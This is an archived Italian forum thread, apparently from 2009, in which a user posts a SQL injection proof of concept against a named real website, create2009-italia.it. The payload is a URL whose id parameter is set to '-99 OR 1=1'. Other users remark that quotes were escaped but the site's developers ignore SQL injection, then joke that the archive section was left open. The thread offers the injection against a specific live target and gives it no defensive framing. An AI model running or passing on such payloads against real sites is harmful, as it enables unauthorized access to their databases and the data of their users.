create2009-italia.it SQL Injection

[BrainStorm]

PoC:

http://www.create2009-italia.it/content/index.php?action=read_pagina&id_cnt=-99%20OR%201=1

Come al solito i creatori del portale sono sempre Socrates Italia.

 

[fojeaf]

ma è così difficile backslashare i ' ?

 

[BrainStorm]

In effetti sono stati backslashati i '.
Il problema è che loro non sono a conoscenza degli attacchi di SQL Injection.

 

[Vladoski]

Facile fare copia incolla (PS non avete bloccato questa sezione xD)

 

[Rubbino]

Vlad è pure del 2009 sta discussione

 

[Vladoski]

Lo so, voglio far notare a muder che ha dimenticato di chiudere la sezione, dato che e un archivio xD